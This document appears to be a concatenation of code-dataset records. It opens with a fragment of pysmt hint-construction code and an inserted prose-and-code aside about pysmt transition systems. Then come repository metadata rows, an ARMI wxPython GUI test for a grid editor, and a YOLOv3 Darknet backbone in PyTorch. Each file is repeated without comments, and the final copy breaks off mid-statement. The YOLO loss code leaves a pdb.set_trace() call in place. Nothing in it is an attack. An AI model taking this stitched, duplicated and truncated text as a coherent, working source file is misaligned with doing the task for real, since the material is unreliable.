loc0 = Location(env, mgr.GE(y, i_0), mgr.GE(pc, i_1))
loc0.set_progress(1, mgr.Equals(x_y, mgr.Plus(y, pc)))
loc1 = Location(env, mgr.GE(y, i_1))
loc1.set_progress(0, mgr.Equals(x_y, y))
h_y = Hint("h_y7", env, frozenset([y]), symbs)
h_y.set_locs([loc0, loc1])
res.append(h_y)
loc0 = Location(env, mgr.Equals(pc, i_1))
loc0.set_progress(1, mgr.GT(x_pc, pc))
loc1 = Location(env, mgr.GE(pc, i_2))
loc1.set_progress(0, mgr.Equals(x_pc, mgr.Div(pc, pc)))
h_pc = Hint("h_pc2", env, frozenset([pc]), symbs)
h_pc.set_locs([loc0, loc1])
res.append(h_pc)
return frozenset(res)
| true
| true
|
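The transition_system function above follows a standard pysmt encoding pattern: each state variable gets a primed (next-state) copy, and init, trans, and fairness are formulas over those symbols. A minimal self-contained sketch of the same pattern for a one-variable counter, using only stock pysmt (no F3 helpers such as symb_to_next):

from pysmt.shortcuts import And, Equals, GE, Int, Plus, Symbol
from pysmt.typing import INT

# Current-state and next-state copies of a single counter variable.
x = Symbol("x", INT)
x_next = Symbol("x.next", INT)

init = Equals(x, Int(0))                 # x = 0
trans = Equals(x_next, Plus(x, Int(1)))  # x' = x + 1
fair = GE(x, Int(0))                     # condition to track along the run

print(And(init, trans, fair).serialize())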
1c40cd0ec916c7cb8d387f5d9e7a69fcb7c06b9b
| 7,379
|
py
|
Python
|
armi/utils/tests/test_gridGui.py
|
keckler/armi
|
b5f95b4795aa21e00fd6786f6994862a4bdccb16
|
[
"Apache-2.0"
] | 162
|
2019-11-01T17:35:58.000Z
|
2022-03-18T04:22:39.000Z
|
armi/utils/tests/test_gridGui.py
|
keckler/armi
|
b5f95b4795aa21e00fd6786f6994862a4bdccb16
|
[
"Apache-2.0"
] | 315
|
2019-11-01T17:32:05.000Z
|
2022-03-30T03:51:42.000Z
|
armi/utils/tests/test_gridGui.py
|
keckler/armi
|
b5f95b4795aa21e00fd6786f6994862a4bdccb16
|
[
"Apache-2.0"
] | 55
|
2019-11-01T16:59:59.000Z
|
2022-03-25T18:19:06.000Z
|
# Copyright 2021 Google, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tests for gridEditor.py.
By default, this would open the app on your primary display and take control of your mouse and keyboard while the
test is running. This means that if your display is smaller than 1000 x 1000, or if you move your mouse while the test
is running, the test might fail even when things are fine.
These issues can be resolved by running the test in a virtual display. To do so, `pip install pytest-xvfb`,
and run `pytest test_gridGui.py` as usual. If you wish to change the resolution of the virtual display, you can modify
the `xvfb_width` and `xvfb_height` in `pytest.ini`.
After you have installed pytest-xvfb, you will no longer see the app displayed on your screen, which can make debugging
harder. Thus, during debugging, you may want the app to appear on your display by setting the `--no-xvfb` flag, and
have the print statements print to your console by setting the `--capture=tee-sys` flag, like this:
```
pytest --no-xvfb --capture=tee-sys test_gridGui.py
```
Note:
These tests currently require a rather specific environment:
1. wxPython needs to be installed, and
2. The test needs to run in a pure X11 environment (doesn't work in Wayland or XWayland, unfortunately).
To check if you are in an X11 environment, run this command:
```
loginctl list-sessions --no-legend | \
cut --delimiter=' ' --field=1 | \
xargs loginctl show-session --property=Type --value
```
If it outputs "x11", it should work (and if it outputs "wayland", it probably won't, for now).
"""
# pylint: disable=missing-function-docstring,missing-class-docstring,abstract-method,protected-access
import asyncio
import os
import pytest
import time
import unittest
import test.support
# wxpython is an optional dependency, and without it we can't do much of anything. This
# should raise a unittest.SkipTest if it can't find wx, signalling to pytest to skip the
# rest of the module. Neat!
wx = test.support.import_module("wx")
from armi import configure, getApp
if getApp() is None:
configure()
from armi.utils import gridEditor
_SECONDS_PER_TICK = 0.05
def _wait(num_ticks: int) -> None:
time.sleep(num_ticks * _SECONDS_PER_TICK)
def _findPointInWindow(
window: wx.Window, offsetFromLeft: float = 0.5, offsetFromTop: float = 0.5
) -> wx.Point:
"""Given a window, return a point in it. Defaults to the center of the window object.
If offsets are smaller than 0 or greater than 1, this would return a point outside the window object.
"""
rect: wx.Rect = window.GetScreenRect()
x = rect.x + int(offsetFromLeft * rect.width)
if x == rect.x + rect.width:
x = rect.x + rect.width - 1
y = rect.y + int(offsetFromTop * rect.height)
if y == rect.y + rect.height:
y = rect.y + rect.height - 1
return wx.Point(x, y)
class GuiTestCase(unittest.TestCase):
"""Provides scaffolding for a GUI test.
Without this scaffolding, the GUI's main loop would block the UIActionSimulator. Thus, the simulated actions and
asserts must be run asynchronously within the GUI's event loop. Since the asserts are also run asynchronously,
we need to make sure that the test does not end until all assert statements have been called, and that the test
outputs are properly passed to the test framework. The app is also properly torn down after each test.
This way, the user only needs to define the simulated actions and the expected behavior in order to write a UI test.
"""
def initializeGui(self):
"""The user can override this to initialize the GUI differently.
Note: This method is called in self.run(), before super().run. We deliberately avoid naming this 'setUp',
because super().run internally calls self.setUp, which would be too late.
"""
self.app = wx.App()
self.frame = wx.Frame(
None, wx.ID_ANY, title="Grid Blueprints UI", pos=(0, 0), size=(1000, 1000)
)
self.gui = gridEditor.GridBlueprintControl(self.frame)
self.frame.Show()
self.inputSimulator = wx.UIActionSimulator()
def _cleanUpApp(self):
for window in wx.GetTopLevelWindows():
try:
assert window.IsModal()
except (AttributeError, AssertionError):
window and window.Close()
else:
window.EndModal(0)
self.app.ScheduleForDestruction(window)
def _runAsync(self, result):
super().run(result)
self._cleanUpApp()
self._testCompleted.set_result(None)
def run(self, result=None):
"""Overrides unittest.TestCase.run."""
self.initializeGui()
loop = asyncio.get_event_loop()
self._testCompleted = loop.create_future()
wx.CallLater(0, self._runAsync, result)
self.app.MainLoop()
loop.run_until_complete(self._testCompleted)
return result
@pytest.mark.skipif(
not bool(os.environ.get("ARMI_GUI_TESTS", False)),
reason="GUI tests require a rather specific environment (see above), so these tests are opt-in",
)
class Test(GuiTestCase):
def test_setNumRings(self):
# Set the number of rings to 1
self.inputSimulator.MouseMove(
_findPointInWindow(self.gui.controls.ringControl, offsetFromLeft=0.15)
)
_wait(num_ticks=5)
self.inputSimulator.MouseDblClick()
_wait(num_ticks=5)
self.inputSimulator.KeyDown(49) # 49 is the keycode for the "1" key
_wait(num_ticks=1)
self.inputSimulator.KeyUp(49)
_wait(num_ticks=5)
# Select (i, j) specifier
self.inputSimulator.MouseMove(_findPointInWindow(self.gui.controls.labelMode))
_wait(num_ticks=5)
self.inputSimulator.MouseDown()
_wait(num_ticks=1)
self.inputSimulator.MouseUp()
_wait(num_ticks=5)
self.inputSimulator.MouseMove(
_findPointInWindow(self.gui.controls.labelMode, offsetFromTop=1.5)
)
_wait(num_ticks=5)
self.inputSimulator.MouseDown()
_wait(num_ticks=1)
self.inputSimulator.MouseUp()
_wait(num_ticks=5)
# Click the Apply button
self.inputSimulator.MouseMove(_findPointInWindow(self.gui.controls.ringApply))
_wait(num_ticks=5)
self.inputSimulator.MouseDown()
_wait(num_ticks=1)
self.inputSimulator.MouseUp()
_wait(num_ticks=5)
# Assert that there is only one grid cell
gridCellIndices = self.gui.clicker.indicesToPdcId
self.assertEqual(1, len(gridCellIndices))
        # Assert that the grid cell contains "0, 0"
labels = [self.gui.clicker._getLabel(idx)[0] for idx in gridCellIndices]
self.assertEqual("0, 0", labels[0])
if __name__ == "__main__":
unittest.main()
| 38.432292
| 120
| 0.69237
|
import asyncio
import os
import pytest
import time
import unittest
import test.support
wx = test.support.import_module("wx")
from armi import configure, getApp
if getApp() is None:
configure()
from armi.utils import gridEditor
_SECONDS_PER_TICK = 0.05
def _wait(num_ticks: int) -> None:
time.sleep(num_ticks * _SECONDS_PER_TICK)
def _findPointInWindow(
window: wx.Window, offsetFromLeft: float = 0.5, offsetFromTop: float = 0.5
) -> wx.Point:
rect: wx.Rect = window.GetScreenRect()
x = rect.x + int(offsetFromLeft * rect.width)
if x == rect.x + rect.width:
x = rect.x + rect.width - 1
y = rect.y + int(offsetFromTop * rect.height)
if y == rect.y + rect.height:
y = rect.y + rect.height - 1
return wx.Point(x, y)
class GuiTestCase(unittest.TestCase):
def initializeGui(self):
self.app = wx.App()
self.frame = wx.Frame(
None, wx.ID_ANY, title="Grid Blueprints UI", pos=(0, 0), size=(1000, 1000)
)
self.gui = gridEditor.GridBlueprintControl(self.frame)
self.frame.Show()
self.inputSimulator = wx.UIActionSimulator()
def _cleanUpApp(self):
for window in wx.GetTopLevelWindows():
try:
assert window.IsModal()
except (AttributeError, AssertionError):
window and window.Close()
else:
window.EndModal(0)
self.app.ScheduleForDestruction(window)
def _runAsync(self, result):
super().run(result)
self._cleanUpApp()
self._testCompleted.set_result(None)
def run(self, result=None):
self.initializeGui()
loop = asyncio.get_event_loop()
self._testCompleted = loop.create_future()
wx.CallLater(0, self._runAsync, result)
self.app.MainLoop()
loop.run_until_complete(self._testCompleted)
return result
@pytest.mark.skipif(
not bool(os.environ.get("ARMI_GUI_TESTS", False)),
reason="GUI tests require a rather specific environment (see above), so these tests are opt-in",
)
class Test(GuiTestCase):
def test_setNumRings(self):
# Set the number of rings to 1
self.inputSimulator.MouseMove(
_findPointInWindow(self.gui.controls.ringControl, offsetFromLeft=0.15)
)
_wait(num_ticks=5)
self.inputSimulator.MouseDblClick()
_wait(num_ticks=5)
self.inputSimulator.KeyDown(49) # 49 is the keycode for the "1" key
_wait(num_ticks=1)
self.inputSimulator.KeyUp(49)
_wait(num_ticks=5)
# Select (i, j) specifier
self.inputSimulator.MouseMove(_findPointInWindow(self.gui.controls.labelMode))
_wait(num_ticks=5)
self.inputSimulator.MouseDown()
_wait(num_ticks=1)
self.inputSimulator.MouseUp()
_wait(num_ticks=5)
self.inputSimulator.MouseMove(
_findPointInWindow(self.gui.controls.labelMode, offsetFromTop=1.5)
)
_wait(num_ticks=5)
self.inputSimulator.MouseDown()
_wait(num_ticks=1)
self.inputSimulator.MouseUp()
_wait(num_ticks=5)
# Click the Apply button
self.inputSimulator.MouseMove(_findPointInWindow(self.gui.controls.ringApply))
_wait(num_ticks=5)
self.inputSimulator.MouseDown()
_wait(num_ticks=1)
self.inputSimulator.MouseUp()
_wait(num_ticks=5)
# Assert that there is only one grid cell
gridCellIndices = self.gui.clicker.indicesToPdcId
self.assertEqual(1, len(gridCellIndices))
        # Assert that the grid cell contains "0, 0"
labels = [self.gui.clicker._getLabel(idx)[0] for idx in gridCellIndices]
self.assertEqual("0, 0", labels[0])
if __name__ == "__main__":
unittest.main()
| true
| true
|
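The scaffolding above works around a general wxPython testing problem: wx.App.MainLoop() blocks, so simulated input and assertions have to be scheduled to run inside the event loop rather than after it. A stripped-down sketch of that scheduling idea outside of unittest (it still needs a display or Xvfb, as the test module notes):

import wx

app = wx.App()
frame = wx.Frame(None, title="demo")
frame.Show()
sim = wx.UIActionSimulator()

def drive():
    # Runs inside the event loop, after MainLoop() has started.
    rect = frame.GetScreenRect()
    sim.MouseMove(wx.Point(rect.x + rect.width // 2, rect.y + rect.height // 2))
    sim.MouseClick()
    wx.CallLater(100, app.ExitMainLoop)  # finish once the click is delivered

wx.CallLater(0, drive)  # schedule the simulated actions
app.MainLoop()          # blocks until ExitMainLoop is called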
1c40cd99485425830543e682f8506d0020f2d87f
| 16,734
|
py
|
Python
|
detection/models/detection/yolo/backbone.py
|
stanford-policylab/surveilling-surveillance
|
bbb9a147927a6342eecfe07ffa756b3acdb63f35
|
[
"MIT"
] | 8
|
2021-05-21T03:38:52.000Z
|
2021-11-21T08:32:41.000Z
|
detection/models/detection/yolo/backbone.py
|
stanford-policylab/surveilling-surveillance
|
bbb9a147927a6342eecfe07ffa756b3acdb63f35
|
[
"MIT"
] | null | null | null |
detection/models/detection/yolo/backbone.py
|
stanford-policylab/surveilling-surveillance
|
bbb9a147927a6342eecfe07ffa756b3acdb63f35
|
[
"MIT"
] | 1
|
2021-06-13T21:49:14.000Z
|
2021-06-13T21:49:14.000Z
|
'''
ABOUT THIS SCRIPT:
This is a YOLOv3 implementation that constructs the model layers
from a configuration file and runs forward passes through them.
This script is a slightly modified version of the following repo:
https://github.com/eriklindernoren/PyTorch-YOLOv3.git
'''
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from .utils import (slice_boundary,
parse_model_config,
to_cpu,
build_targets)
from . import constants as C
def create_modules(module_defs, ignore_width):
"""
Constructs module list of layer blocks from module configuration in module_defs
"""
hyperparams = module_defs.pop(0)
output_filters = [int(hyperparams["channels"])]
module_list = nn.ModuleList()
for module_i, module_def in enumerate(module_defs):
modules = nn.Sequential()
if module_def["type"] == "convolutional":
bn = int(module_def["batch_normalize"])
filters = int(module_def["filters"])
kernel_size = int(module_def["size"])
pad = (kernel_size - 1) // 2
modules.add_module(
f"conv_{module_i}",
nn.Conv2d(
in_channels=output_filters[-1],
out_channels=filters,
kernel_size=kernel_size,
stride=int(module_def["stride"]),
padding=pad,
bias=not bn,
),
)
if bn:
modules.add_module(f"batch_norm_{module_i}", nn.BatchNorm2d(
filters, momentum=0.9, eps=1e-5))
if module_def["activation"] == "leaky":
modules.add_module(f"leaky_{module_i}", nn.LeakyReLU(0.1))
elif module_def["type"] == "maxpool":
kernel_size = int(module_def["size"])
stride = int(module_def["stride"])
if kernel_size == 2 and stride == 1:
modules.add_module(
f"_debug_padding_{module_i}", nn.ZeroPad2d((0, 1, 0, 1)))
maxpool = nn.MaxPool2d(
kernel_size=kernel_size,
stride=stride,
padding=int(
(kernel_size - 1) // 2))
modules.add_module(f"maxpool_{module_i}", maxpool)
elif module_def["type"] == "upsample":
upsample = Upsample(scale_factor=int(
module_def["stride"]), mode="nearest")
modules.add_module(f"upsample_{module_i}", upsample)
elif module_def["type"] == "route":
layers = [int(x) for x in module_def["layers"].split(",")]
filters = sum([output_filters[1:][i] for i in layers])
modules.add_module(f"route_{module_i}", EmptyLayer())
elif module_def["type"] == "shortcut":
filters = output_filters[1:][int(module_def["from"])]
modules.add_module(f"shortcut_{module_i}", EmptyLayer())
elif module_def["type"] == "yolo":
anchor_idxs = [int(x) for x in module_def["mask"].split(",")]
# Extract anchors
anchors = [int(x) for x in module_def["anchors"].split(",")]
anchors = [(anchors[i], anchors[i + 1])
for i in range(0, len(anchors), 2)]
anchors = [anchors[i] for i in anchor_idxs]
num_classes = int(module_def["classes"])
img_size = int(hyperparams["height"])
# Define detection layer
yolo_layer = YOLOLayer(anchors, num_classes, ignore_width, img_size)
modules.add_module(f"yolo_{module_i}", yolo_layer)
# Register module list and number of output filters
module_list.append(modules)
output_filters.append(filters)
return hyperparams, module_list
class Upsample(nn.Module):
""" nn.Upsample is deprecated """
def __init__(self, scale_factor, mode="nearest"):
super(Upsample, self).__init__()
self.scale_factor = scale_factor
self.mode = mode
def forward(self, x):
x = F.interpolate(x, scale_factor=self.scale_factor, mode=self.mode)
return x
class EmptyLayer(nn.Module):
"""Placeholder for 'route' and 'shortcut' layers"""
def __init__(self):
super(EmptyLayer, self).__init__()
class YOLOLayer(nn.Module):
"""Detection layer"""
def __init__(self, anchors, num_classes, ignore_width=32, img_dim=416):
super(YOLOLayer, self).__init__()
self.anchors = anchors
self.num_anchors = len(anchors)
self.num_classes = num_classes
self.ignore_width = ignore_width
self.ignore_thres = 0.5
self.mse_loss = nn.MSELoss()
self.bce_loss = nn.BCELoss()
self.obj_scale = 1
self.noobj_scale = 100
self.metrics = {}
self.img_dim = img_dim
self.grid_size = 0 # grid size
def compute_grid_offsets(self, grid_size, cuda=True):
self.grid_size = grid_size
g = self.grid_size
FloatTensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor
self.stride = self.img_dim / self.grid_size
# Calculate offsets for each grid
self.grid_x = torch.arange(g).repeat(
g, 1).view([1, 1, g, g]).type(FloatTensor)
self.grid_y = torch.arange(g).repeat(
g, 1).t().view([1, 1, g, g]).type(FloatTensor)
self.scaled_anchors = FloatTensor(
[(a_w / self.stride, a_h / self.stride) for a_w, a_h in self.anchors])
self.anchor_w = self.scaled_anchors[:, 0:1].view(
(1, self.num_anchors, 1, 1))
self.anchor_h = self.scaled_anchors[:, 1:2].view(
(1, self.num_anchors, 1, 1))
def forward(self, x, targets=None, image_size=416, return_metrics=False):
# Tensors for cuda support
FloatTensor = torch.cuda.FloatTensor if x.is_cuda else torch.FloatTensor
self.img_dim = image_size
num_samples = x.size(0)
grid_size = x.size(2)
prediction = (
x.view(num_samples, self.num_anchors,
self.num_classes + 5, grid_size, grid_size)
.permute(0, 1, 3, 4, 2)
.contiguous()
)
# Get outputs
x = torch.sigmoid(prediction[..., 0]) # Center x
y = torch.sigmoid(prediction[..., 1]) # Center y
w = prediction[..., 2] # Width
h = prediction[..., 3] # Height
pred_conf = torch.sigmoid(prediction[..., 4]) # Conf
pred_cls = torch.sigmoid(prediction[..., 5:]) # Cls pred.
if grid_size != self.grid_size:
self.compute_grid_offsets(grid_size, cuda=x.is_cuda)
# Add offset and scale with anchors
pred_boxes = FloatTensor(prediction[..., :4].shape)
pred_boxes[..., 0] = x.data + self.grid_x
pred_boxes[..., 1] = y.data + self.grid_y
pred_boxes[..., 2] = torch.exp(w.data) * self.anchor_w
pred_boxes[..., 3] = torch.exp(h.data) * self.anchor_h
# Only keep predictions inside the boundary
# Note: Due to FPN, predictions across different scales are combined
# Need to adjust slice boundary accordingly
assert (grid_size * self.ignore_width) % C.SIZE == 0
boundary = grid_size * self.ignore_width // C.SIZE
output = torch.cat(
(slice_boundary(
pred_boxes, boundary).view(
num_samples, -1, 4) * self.stride, slice_boundary(
pred_conf, boundary).view(
num_samples, -1, 1), pred_cls.view(
num_samples, -1, self.num_classes), ), -1, )
if targets is None:
return output, 0
iou_scores, obj_mask, noobj_mask, tx, ty, tw, th, tconf =\
build_targets(
pred_boxes=pred_boxes,
target=targets,
anchors=self.scaled_anchors,
ignore_thres=self.ignore_thres,
)
# Remove the boundary from predictions, ground truth, and masks
# when computing the loss.
tensors = [pred_boxes, pred_conf, tconf, x, tx, y, ty,
w, tw, h, th, iou_scores, obj_mask, noobj_mask]
(pred_boxes, pred_conf, tconf, x, tx, y, ty,
w, tw, h, th, iou_scores, obj_mask, noobj_mask) = [
slice_boundary(tensor, boundary)
for tensor in tensors
]
# Loss : Mask outputs to ignore non-existing objects (except with conf.
# loss)
loss_x = self.mse_loss(x[obj_mask.bool()], tx[obj_mask.bool()])
loss_y = self.mse_loss(y[obj_mask.bool()], ty[obj_mask.bool()])
loss_w = self.mse_loss(w[obj_mask.bool()], tw[obj_mask.bool()])
loss_h = self.mse_loss(h[obj_mask.bool()], th[obj_mask.bool()])
loss_conf_obj = self.bce_loss(
pred_conf[obj_mask.bool()], tconf[obj_mask.bool()])
loss_conf_noobj = self.bce_loss(
pred_conf[noobj_mask.bool()], tconf[noobj_mask.bool()])
loss_conf = self.obj_scale * loss_conf_obj + self.noobj_scale * loss_conf_noobj
if obj_mask.bool().sum().item() == 0:
total_loss = self.noobj_scale * loss_conf_noobj
else:
# Ignore useless classification loss
total_loss = loss_x + loss_y + loss_w + loss_h + loss_conf
if torch.isnan(total_loss).item():
import pdb
pdb.set_trace()
if not return_metrics:
return output, total_loss
else:
# Metrics
conf_obj = pred_conf[obj_mask.bool()].mean()
conf_noobj = pred_conf[noobj_mask.bool()].mean()
conf50 = (pred_conf > 0.5).float()
iou50 = (iou_scores > 0.5).float()
iou75 = (iou_scores > 0.75).float()
detected_mask = conf50 * tconf
precision = torch.sum(iou50 * detected_mask) / \
(conf50.sum() + 1e-16)
recall50 = torch.sum(iou50 * detected_mask) / \
(obj_mask.sum() + 1e-16)
recall75 = torch.sum(iou75 * detected_mask) / \
(obj_mask.sum() + 1e-16)
self.metrics = {
"loss": to_cpu(total_loss).item(),
"x": to_cpu(loss_x).item(),
"y": to_cpu(loss_y).item(),
"w": to_cpu(loss_w).item(),
"h": to_cpu(loss_h).item(),
"conf": to_cpu(loss_conf).item(),
"recall50": to_cpu(recall50).item(),
"recall75": to_cpu(recall75).item(),
"precision": to_cpu(precision).item(),
"conf_obj": to_cpu(conf_obj).item(),
"conf_noobj": to_cpu(conf_noobj).item(),
"grid_size": grid_size,
}
return output, total_loss, self.metrics
class Darknet(nn.Module):
"""YOLOv3 object detection model"""
def __init__(self, config_path, ignore_width, num_classes=80, img_size=416):
super(Darknet, self).__init__()
self.module_defs = parse_model_config(config_path, num_classes)
self.hyperparams, self.module_list = create_modules(
self.module_defs, ignore_width)
self.yolo_layers = [
layer[0] for layer in self.module_list if hasattr(
layer[0], "metrics")]
self.img_size = img_size
self.seen = 0
self.header_info = np.array([0, 0, 0, self.seen, 0], dtype=np.int32)
def forward(self, x, targets):
img_dim = x.shape[2]
loss = 0
layer_outputs, yolo_outputs = [], []
for i, (module_def, module) in enumerate(
zip(self.module_defs, self.module_list)):
if module_def["type"] in ["convolutional", "upsample", "maxpool"]:
x = module(x)
elif module_def["type"] == "route":
x = torch.cat([layer_outputs[int(layer_i)]
for layer_i in module_def["layers"].split(",")], 1)
elif module_def["type"] == "shortcut":
layer_i = int(module_def["from"])
x = layer_outputs[-1] + layer_outputs[layer_i]
elif module_def["type"] == "yolo":
                x, layer_loss = module[0](x, targets, img_dim)
loss += layer_loss
yolo_outputs.append(x)
layer_outputs.append(x)
yolo_outputs = to_cpu(torch.cat(yolo_outputs, 1))
return loss, yolo_outputs
def infer(self, x):
loss, yolo_outputs = self.forward(x, None)
return yolo_outputs
def load_darknet_weights(self, weights_path):
"""Parses and loads the weights stored in 'weights_path'"""
# Open the weights file
with open(weights_path, "rb") as f:
# First five are header values
header = np.fromfile(f, dtype=np.int32, count=5)
self.header_info = header # Needed to write header when saving weights
self.seen = header[3] # number of images seen during training
weights = np.fromfile(f, dtype=np.float32) # The rest are weights
# Establish cutoff for loading backbone weights
cutoff = None
if "darknet53.conv.74" in weights_path:
cutoff = 75
ptr = 0
for i, (module_def, module) in enumerate(
zip(self.module_defs, self.module_list)):
if i == cutoff:
break
if module_def["type"] == "convolutional":
conv_layer = module[0]
if module_def["batch_normalize"]:
# Load BN bias, weights, running mean and running variance
bn_layer = module[1]
num_b = bn_layer.bias.numel() # Number of biases
# Bias
bn_b = torch.from_numpy(
weights[ptr: ptr + num_b]).view_as(bn_layer.bias)
bn_layer.bias.data.copy_(bn_b)
ptr += num_b
# Weight
bn_w = torch.from_numpy(
weights[ptr: ptr + num_b]).view_as(bn_layer.weight)
bn_layer.weight.data.copy_(bn_w)
ptr += num_b
# Running Mean
bn_rm = torch.from_numpy(
weights[ptr: ptr + num_b]).view_as(bn_layer.running_mean)
bn_layer.running_mean.data.copy_(bn_rm)
ptr += num_b
# Running Var
bn_rv = torch.from_numpy(
weights[ptr: ptr + num_b]).view_as(bn_layer.running_var)
bn_layer.running_var.data.copy_(bn_rv)
ptr += num_b
else:
# Load conv. bias
num_b = conv_layer.bias.numel()
conv_b = torch.from_numpy(
weights[ptr: ptr + num_b]).view_as(conv_layer.bias)
conv_layer.bias.data.copy_(conv_b)
ptr += num_b
# Load conv. weights
num_w = conv_layer.weight.numel()
conv_w = torch.from_numpy(
weights[ptr: ptr + num_w]).view_as(conv_layer.weight)
conv_layer.weight.data.copy_(conv_w)
ptr += num_w
def save_darknet_weights(self, path, cutoff=-1):
"""
@:param path - path of the new weights file
@:param cutoff - save layers between 0 and cutoff (cutoff = -1 -> all are saved)
"""
fp = open(path, "wb")
self.header_info[3] = self.seen
self.header_info.tofile(fp)
# Iterate through layers
for i, (module_def, module) in enumerate(
zip(self.module_defs[:cutoff], self.module_list[:cutoff])):
if module_def["type"] == "convolutional":
conv_layer = module[0]
                # If batch norm, save the bn parameters first
if module_def["batch_normalize"]:
bn_layer = module[1]
bn_layer.bias.data.cpu().numpy().tofile(fp)
bn_layer.weight.data.cpu().numpy().tofile(fp)
bn_layer.running_mean.data.cpu().numpy().tofile(fp)
bn_layer.running_var.data.cpu().numpy().tofile(fp)
                # Save conv bias
else:
conv_layer.bias.data.cpu().numpy().tofile(fp)
                # Save conv weights
conv_layer.weight.data.cpu().numpy().tofile(fp)
fp.close()
| 40.914425
| 93
| 0.553783
|
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from .utils import (slice_boundary,
parse_model_config,
to_cpu,
build_targets)
from . import constants as C
def create_modules(module_defs, ignore_width):
hyperparams = module_defs.pop(0)
output_filters = [int(hyperparams["channels"])]
module_list = nn.ModuleList()
for module_i, module_def in enumerate(module_defs):
modules = nn.Sequential()
if module_def["type"] == "convolutional":
bn = int(module_def["batch_normalize"])
filters = int(module_def["filters"])
kernel_size = int(module_def["size"])
pad = (kernel_size - 1) // 2
modules.add_module(
f"conv_{module_i}",
nn.Conv2d(
in_channels=output_filters[-1],
out_channels=filters,
kernel_size=kernel_size,
stride=int(module_def["stride"]),
padding=pad,
bias=not bn,
),
)
if bn:
modules.add_module(f"batch_norm_{module_i}", nn.BatchNorm2d(
filters, momentum=0.9, eps=1e-5))
if module_def["activation"] == "leaky":
modules.add_module(f"leaky_{module_i}", nn.LeakyReLU(0.1))
elif module_def["type"] == "maxpool":
kernel_size = int(module_def["size"])
stride = int(module_def["stride"])
if kernel_size == 2 and stride == 1:
modules.add_module(
f"_debug_padding_{module_i}", nn.ZeroPad2d((0, 1, 0, 1)))
maxpool = nn.MaxPool2d(
kernel_size=kernel_size,
stride=stride,
padding=int(
(kernel_size - 1) // 2))
modules.add_module(f"maxpool_{module_i}", maxpool)
elif module_def["type"] == "upsample":
upsample = Upsample(scale_factor=int(
module_def["stride"]), mode="nearest")
modules.add_module(f"upsample_{module_i}", upsample)
elif module_def["type"] == "route":
layers = [int(x) for x in module_def["layers"].split(",")]
filters = sum([output_filters[1:][i] for i in layers])
modules.add_module(f"route_{module_i}", EmptyLayer())
elif module_def["type"] == "shortcut":
filters = output_filters[1:][int(module_def["from"])]
modules.add_module(f"shortcut_{module_i}", EmptyLayer())
elif module_def["type"] == "yolo":
anchor_idxs = [int(x) for x in module_def["mask"].split(",")]
anchors = [int(x) for x in module_def["anchors"].split(",")]
anchors = [(anchors[i], anchors[i + 1])
for i in range(0, len(anchors), 2)]
anchors = [anchors[i] for i in anchor_idxs]
num_classes = int(module_def["classes"])
img_size = int(hyperparams["height"])
yolo_layer = YOLOLayer(anchors, num_classes, ignore_width, img_size)
modules.add_module(f"yolo_{module_i}", yolo_layer)
module_list.append(modules)
output_filters.append(filters)
return hyperparams, module_list
class Upsample(nn.Module):
def __init__(self, scale_factor, mode="nearest"):
super(Upsample, self).__init__()
self.scale_factor = scale_factor
self.mode = mode
def forward(self, x):
x = F.interpolate(x, scale_factor=self.scale_factor, mode=self.mode)
return x
class EmptyLayer(nn.Module):
def __init__(self):
super(EmptyLayer, self).__init__()
class YOLOLayer(nn.Module):
def __init__(self, anchors, num_classes, ignore_width=32, img_dim=416):
super(YOLOLayer, self).__init__()
self.anchors = anchors
self.num_anchors = len(anchors)
self.num_classes = num_classes
self.ignore_width = ignore_width
self.ignore_thres = 0.5
self.mse_loss = nn.MSELoss()
self.bce_loss = nn.BCELoss()
self.obj_scale = 1
self.noobj_scale = 100
self.metrics = {}
self.img_dim = img_dim
self.grid_size = 0
def compute_grid_offsets(self, grid_size, cuda=True):
self.grid_size = grid_size
g = self.grid_size
FloatTensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor
self.stride = self.img_dim / self.grid_size
self.grid_x = torch.arange(g).repeat(
g, 1).view([1, 1, g, g]).type(FloatTensor)
self.grid_y = torch.arange(g).repeat(
g, 1).t().view([1, 1, g, g]).type(FloatTensor)
self.scaled_anchors = FloatTensor(
[(a_w / self.stride, a_h / self.stride) for a_w, a_h in self.anchors])
self.anchor_w = self.scaled_anchors[:, 0:1].view(
(1, self.num_anchors, 1, 1))
self.anchor_h = self.scaled_anchors[:, 1:2].view(
(1, self.num_anchors, 1, 1))
def forward(self, x, targets=None, image_size=416, return_metrics=False):
FloatTensor = torch.cuda.FloatTensor if x.is_cuda else torch.FloatTensor
self.img_dim = image_size
num_samples = x.size(0)
grid_size = x.size(2)
prediction = (
x.view(num_samples, self.num_anchors,
self.num_classes + 5, grid_size, grid_size)
.permute(0, 1, 3, 4, 2)
.contiguous()
)
x = torch.sigmoid(prediction[..., 0])
y = torch.sigmoid(prediction[..., 1])
w = prediction[..., 2]
h = prediction[..., 3]
pred_conf = torch.sigmoid(prediction[..., 4])
pred_cls = torch.sigmoid(prediction[..., 5:])
if grid_size != self.grid_size:
self.compute_grid_offsets(grid_size, cuda=x.is_cuda)
pred_boxes = FloatTensor(prediction[..., :4].shape)
pred_boxes[..., 0] = x.data + self.grid_x
pred_boxes[..., 1] = y.data + self.grid_y
pred_boxes[..., 2] = torch.exp(w.data) * self.anchor_w
pred_boxes[..., 3] = torch.exp(h.data) * self.anchor_h
assert (grid_size * self.ignore_width) % C.SIZE == 0
boundary = grid_size * self.ignore_width // C.SIZE
output = torch.cat(
(slice_boundary(
pred_boxes, boundary).view(
num_samples, -1, 4) * self.stride, slice_boundary(
pred_conf, boundary).view(
num_samples, -1, 1), pred_cls.view(
num_samples, -1, self.num_classes), ), -1, )
if targets is None:
return output, 0
iou_scores, obj_mask, noobj_mask, tx, ty, tw, th, tconf =\
build_targets(
pred_boxes=pred_boxes,
target=targets,
anchors=self.scaled_anchors,
ignore_thres=self.ignore_thres,
)
tensors = [pred_boxes, pred_conf, tconf, x, tx, y, ty,
w, tw, h, th, iou_scores, obj_mask, noobj_mask]
(pred_boxes, pred_conf, tconf, x, tx, y, ty,
